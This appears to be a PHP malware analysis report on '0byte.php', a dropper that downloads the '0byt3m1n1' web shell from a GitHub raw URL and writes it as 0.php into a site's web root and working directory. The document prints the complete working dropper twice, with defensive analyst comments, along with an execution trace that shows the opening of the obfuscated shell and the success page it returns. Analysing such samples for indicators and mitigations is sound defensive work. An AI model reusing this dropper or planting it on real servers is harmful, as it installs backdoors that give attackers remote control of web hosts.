PHP Malware Analysis

0byte.php

md5: fa57ac30a60753991bf682d7367c9842


Deobfuscated PHP code

<?php

/*
	403 FORBIDDEN BYPASS
	WITH BACKDOOR RECALL / SHELL SUMMON
*/
// Remote location of the payload the dropper fetches: the "0byt3m1n1" minishell
// served raw from the zerobyte-id/PHP-Backdoor GitHub repository. The hostname and
// path are the network indicator for this sample.
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
// Basename the fetched payload is written under (host indicator: a new "0.php"
// appearing in the web root and/or in the directory this script runs from).
$name = "0.php";
/**
 * Dropper routine: reads a PHP payload from $file and writes it to disk as
 * $name in two places — the web server's DOCUMENT_ROOT and the current working
 * directory — then echoes an HTML link pointing at the first copy.
 *
 * Analyst notes (defensive):
 *  - Both fopen()/fwrite() pairs run unconditionally before any check, so two
 *    on-disk artifacts are produced even though only one URL is reported.
 *  - Paths are built with a doubled separator ("<dir>//0.php"); that exact
 *    string is what appears in the execution trace and is useful for log searches.
 *  - No fopen() result is checked and no handle is closed.
 *  - The "[OK!]" <h1> line containing the dropped file's URL is the success
 *    indicator and a usable signature for the HTTP response body.
 *
 * @param string $name basename to write (here "0.php")
 * @param string $file URL or path handed straight to file_get_contents()
 */
function _doEvil($name, $file)
{
    $filename = $name;
    // Outbound fetch of the payload; fetching a URL this way requires
    // allow_url_fopen=On, so disabling it is one host-level mitigation.
    $getFile = file_get_contents($file);
    $rootPath = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;
    // First copy: the web root. Note the extra "/" yields "<root>//0.php".
    $toRootFopen = fopen("{$rootPath}/{$filename}", 'w');
    $toRootExec = fwrite($toRootFopen, $getFile);
    // '.' binds tighter than '?:', so the full URL is only assembled on the
    // non-HTTPS branch; with HTTPS set this evaluates to the bare string "https".
    $rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . "/{$filename}";
    $realPath = getcwd() . DIRECTORY_SEPARATOR;
    // Second copy: the directory the dropper itself runs from, written
    // regardless of whether the web-root write succeeded.
    $toRealFopen = fopen("{$realPath}/{$filename}", 'w');
    $toRealExec = fwrite($toRealFopen, $getFile);
    // REQUEST_URI is unquoted here, i.e. an undefined constant: PHP 7 treats it
    // as the string 'REQUEST_URI' with a notice/warning, PHP 8 raises an Error.
    $realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . dirname($_SERVER[REQUEST_URI]) . "/{$filename}";
    echo "<center>";
    // Reporting only: fwrite() returns the byte count, so any non-zero write to
    // the web root selects this branch; the cwd copy is reported only when the
    // root write returned 0/false, even though it was written either way.
    if ($toRootExec) {
        if (file_exists($rootPath . "{$filename}")) {
            echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$rootShellUrl}\" target=\"_blank\">{$rootShellUrl}</a></font></h1>";
        } else {
            echo "<h1><font color=\"red\">{$rootPath}{$filename}<br>Doesn't exist!</font>Try with another method!</h1>";
        }
    } else {
        if ($toRealExec) {
            if (file_exists($realPath . "{$filename}")) {
                echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$realShellUrl}\" target=\"_blank\">{$realShellUrl}</a></font></h1>";
            } else {
                echo "<h1><font color=\"red\">FAILED!</font></h1>";
            }
        }
    }
    echo "</center>";
}
// Top-level call: the fetch-and-write runs on every request to this file, with
// no authentication or parameter gating.
_doEvil($name, $source);
?>  

Execution traces

data/traces/fa57ac30a60753991bf682d7367c9842_trace-1676259232.0258.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:34:17.923648]
1	0	1	0.000141	393512
1	3	0	0.000308	406288	{main}	1		/var/www/html/uploads/0byte.php	0	0
1		A						/var/www/html/uploads/0byte.php	6	$source = 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
1		A						/var/www/html/uploads/0byte.php	7	$name = '0.php'
2	4	0	0.000358	406288	_doEvil	1		/var/www/html/uploads/0byte.php	41	2	'0.php'	'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
2		A						/var/www/html/uploads/0byte.php	10	$filename = '0.php'
3	5	0	0.000386	406288	file_get_contents	0		/var/www/html/uploads/0byte.php	11	1	'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
3	5	1	0.037061	422304
3	5	R			'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
2		A						/var/www/html/uploads/0byte.php	11	$getFile = '<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
2		A						/var/www/html/uploads/0byte.php	12	$rootPath = '/var/www/html/'
3	6	0	0.037192	422352	fopen	0		/var/www/html/uploads/0byte.php	13	2	'/var/www/html//0.php'	'w'
3	6	1	0.037244	422888
3	6	R			resource(5) of type (stream)
2		A						/var/www/html/uploads/0byte.php	13	$toRootFopen = resource(5) of type (stream)
3	7	0	0.037274	422768	fwrite	0		/var/www/html/uploads/0byte.php	14	2	resource(5) of type (stream)	'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
3	7	1	0.037334	422832
3	7	R			9202
2		A						/var/www/html/uploads/0byte.php	14	$toRootExec = 9202
2		A						/var/www/html/uploads/0byte.php	15	$rootShellUrl = 'http://localhost/0.php'
3	8	0	0.037397	422816	getcwd	0		/var/www/html/uploads/0byte.php	16	0
3	8	1	0.037411	422864
3	8	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/0byte.php	16	$realPath = '/var/www/html/uploads/'
3	9	0	0.037437	422920	fopen	0		/var/www/html/uploads/0byte.php	17	2	'/var/www/html/uploads//0.php'	'w'
3	9	1	0.037469	423464
3	9	R			resource(6) of type (stream)
2		A						/var/www/html/uploads/0byte.php	17	$toRealFopen = resource(6) of type (stream)
3	10	0	0.037497	423336	fwrite	0		/var/www/html/uploads/0byte.php	18	2	resource(6) of type (stream)	'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
3	10	1	0.037548	423400
3	10	R			9202
2		A						/var/www/html/uploads/0byte.php	18	$toRealExec = 9202
3	11	0	0.037587	423384	dirname	0		/var/www/html/uploads/0byte.php	19	1	'/uploads/0byte.php'
3	11	1	0.037602	423464
3	11	R			'/uploads'
2		A						/var/www/html/uploads/0byte.php	19	$realShellUrl = 'http://localhost/uploads/0.php'
3	12	0	0.037630	423440	file_exists	0		/var/www/html/uploads/0byte.php	22	1	'/var/www/html/0.php'
3	12	1	0.037649	423480
3	12	R			TRUE
2	4	1	0.037669	407096
1	3	1	0.037677	407096
			0.037713	326928
TRACE END   [2023-02-13 01:34:17.961249]


Generated HTML code

<html><head></head><body><center><h1><font color="#00FF00">[OK!] <a href="http://localhost/0.php" target="_blank">http://localhost/0.php</a></font></h1></center>  </body></html>

Original PHP code

<?php
/*
	403 FORBIDDEN BYPASS
	WITH BACKDOOR RECALL / SHELL SUMMON
*/
// Remote location of the payload the dropper fetches: the "0byt3m1n1" minishell
// served raw from the zerobyte-id/PHP-Backdoor GitHub repository. The hostname and
// path are the network indicator for this sample.
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
// Basename the fetched payload is written under (host indicator: a new "0.php"
// appearing in the web root and/or in the directory this script runs from).
$name = "0.php";

/**
 * Dropper routine: reads a PHP payload from $file and writes it to disk as
 * $name in two places — the web server's DOCUMENT_ROOT and the current working
 * directory — then echoes an HTML link pointing at the first copy.
 *
 * Analyst notes (defensive):
 *  - Both fopen()/fwrite() pairs run unconditionally before any check, so two
 *    on-disk artifacts are produced even though only one URL is reported.
 *  - Paths are built with a doubled separator ("<dir>//0.php"); that exact
 *    string is what appears in the execution trace and is useful for log searches.
 *  - No fopen() result is checked and no handle is closed.
 *  - The "[OK!]" <h1> line containing the dropped file's URL is the success
 *    indicator and a usable signature for the HTTP response body.
 *
 * @param string $name basename to write (here "0.php")
 * @param string $file URL or path handed straight to file_get_contents()
 */
function _doEvil($name, $file) {
	$filename = $name;
	// Outbound fetch of the payload; fetching a URL this way requires
	// allow_url_fopen=On, so disabling it is one host-level mitigation.
	$getFile = file_get_contents($file);
	$rootPath = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR;
	// First copy: the web root. Note the extra "/" yields "<root>//0.php".
	$toRootFopen = fopen("$rootPath/$filename",'w');
	$toRootExec = fwrite($toRootFopen, $getFile);
	// '.' binds tighter than '?:', so the full URL is only assembled on the
	// non-HTTPS branch; with HTTPS set this evaluates to the bare string "https".
	$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]"."/$filename";
	$realPath = getcwd().DIRECTORY_SEPARATOR;
	// Second copy: the directory the dropper itself runs from, written
	// regardless of whether the web-root write succeeded.
	$toRealFopen = fopen("$realPath/$filename",'w');
	$toRealExec = fwrite($toRealFopen, $getFile);
	// REQUEST_URI is unquoted here, i.e. an undefined constant: PHP 7 treats it
	// as the string 'REQUEST_URI' with a notice/warning, PHP 8 raises an Error.
	$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]".dirname($_SERVER[REQUEST_URI])."/$filename";
	echo "<center>";
	// Reporting only: fwrite() returns the byte count, so any non-zero write to
	// the web root selects this branch; the cwd copy is reported only when the
	// root write returned 0/false, even though it was written either way.
	if($toRootExec) {
		if(file_exists($rootPath."$filename")) {
			echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$rootShellUrl\" target=\"_blank\">$rootShellUrl</a></font></h1>";
		}
		else { 
			echo "<h1><font color=\"red\">$rootPath$filename<br>Doesn't exist!</font>Try with another method!</h1>";
		}
	}
	else {
		if($toRealExec) {
			if(file_exists($realPath."$filename")) {
				echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$realShellUrl\" target=\"_blank\">$realShellUrl</a></font></h1>";
			}
			else { 
				echo "<h1><font color=\"red\">FAILED!</font></h1>";
			}
		}
	}
	echo "</center>";
}
// Top-level call: the fetch-and-write runs on every request to this file, with
// no authentication or parameter gating.
_doEvil($name, $source);
?>